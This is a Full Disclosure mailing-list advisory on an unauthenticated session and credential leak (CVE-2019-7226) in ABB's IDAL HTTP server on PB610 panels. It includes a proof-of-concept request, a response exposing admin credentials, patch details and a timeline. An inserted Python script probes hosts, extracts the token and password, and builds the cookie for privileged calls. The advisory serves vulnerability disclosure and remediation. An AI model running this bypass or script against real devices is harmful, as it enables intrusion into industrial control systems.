List: full-disclosure
Subject: [FD] XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability
From: xen1thLabs <xen1thLabs () darkmatter ! ae>
Date: 2019-06-20 12:13:19
Message-ID: 8d318fa8cd3c4cb78aab8ef00df89833 () darkmatter ! ae
XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability
========================================================================
Identifiers
-----------
XL-19-010
CVE-2019-7226
ABBVU-IAMF-1902005
CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Affected vendor
---------------
ABB (new.abb.com)
Credit
------
Eldar Marcussen - xen1thLabs - Software Labs
Vulnerability summary
---------------------
The CGI interface of the IDAL HTTP server exposes a URL that lets an unauthenticated attacker \
obtain an authenticated session, bypassing authentication and gaining access to privileged functions.
Technical details
-----------------
The IDAL CGI interface exposes a URL, /cgi/loginDefaultUser, which creates a session that is \
already in the authenticated state and returns the session ID together with the username and \
plaintext password of the default user. No credentials are required to reach it. An attacker \
can then either log in with the returned credentials or present the string 'IDALToken=......' \
in a Cookie header; either is sufficient to perform privileged operations such as restarting \
the service via /cgi/restart.
Proof of concept
----------------
Request (no authentication, no cookies):
```
GET http://localhost:81/cgi/loginDefaultUser
```
Response body (session ID, username and plaintext password):
```
1
#S_OK
IDALToken=532c8632b86694f0232a68a0897a145c
admin
adminpass
```
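The following is an added example written for this page, not code from xen1thLabs or ABB. It parses the loginDefaultUser response in the layout shown above (status line, #S_OK, IDALToken line, username, password), builds the Cookie header that the advisory says unlocks privileged CGIs, and offers a non-destructive check that only requests the login URL and never touches /cgi/restart. The sample response is constructed from the proof of concept; the hex-only token check, port 81 default, and hostname/timeout parameters are assumptions.

```python
"""Parse the IDAL /cgi/loginDefaultUser response and build the follow-up request.

Added example for this advisory; not xen1thLabs' or ABB's code. The sample body
below is constructed from the response format shown in the proof of concept.
"""
import http.client
from dataclasses import dataclass
from typing import Optional

LOGIN_PATH = "/cgi/loginDefaultUser"

# Constructed sample: the body the advisory shows for a successful bypass.
SAMPLE_RESPONSE = (
    "1\n"
    "#S_OK\n"
    "IDALToken=532c8632b86694f0232a68a0897a145c\n"
    "admin\n"
    "adminpass\n"
)


@dataclass
class DefaultUserSession:
    token: str
    username: str
    password: str

    def cookie_header(self) -> str:
        # Cookie value as described in the advisory: the literal "IDALToken=<id>".
        return f"IDALToken={self.token}"


def parse_login_default_user(body: str) -> Optional[DefaultUserSession]:
    """Return a session if `body` matches the vulnerable response, else None.

    Layout taken from the PoC: a status line "1", then "#S_OK", then an
    "IDALToken=<id>" line, then the username and plaintext password, one per line.
    """
    lines = [ln.strip() for ln in body.splitlines() if ln.strip()]
    if len(lines) < 5 or lines[0] != "1" or lines[1] != "#S_OK":
        return None
    if not lines[2].startswith("IDALToken="):
        return None
    token = lines[2].split("=", 1)[1]
    # Assumption: the token is a hex session id (32 hex chars in the PoC).
    if not token or any(c not in "0123456789abcdefABCDEF" for c in token):
        return None
    return DefaultUserSession(token=token, username=lines[3], password=lines[4])


def privileged_request_headers(session: DefaultUserSession) -> dict:
    """Headers for a follow-up call to a privileged CGI such as /cgi/restart."""
    return {"Cookie": session.cookie_header()}


def check_host(host: str, port: int = 81, timeout: float = 5.0) -> Optional[DefaultUserSession]:
    """Non-destructive check: requests the login URL only, never /cgi/restart.

    Port 81 matches the PoC; the host and timeout values are the caller's.
    Returns the parsed session if the device hands one out unauthenticated.
    """
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", LOGIN_PATH)
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", errors="replace")
    finally:
        conn.close()
    return parse_login_default_user(body)


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        found = check_host(sys.argv[1])
        print("VULNERABLE:" if found else "no default-user session returned", found)
    else:
        print("sample parses to:", parse_login_default_user(SAMPLE_RESPONSE))
```

Run it with a hostname to test a panel (the check stops after the login URL, so it will not restart anything), or with no arguments to see the constructed sample parsed. A match means the device returns a working session and the admin password to anyone on the network; the restart step in the advisory is deliberately left out of the check.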
Affected systems
----------------
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367
Solution
--------
Apply the patches and instructions from vendor:
- ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch
Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
17/06/2019 - xen1thLabs public disclosure
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/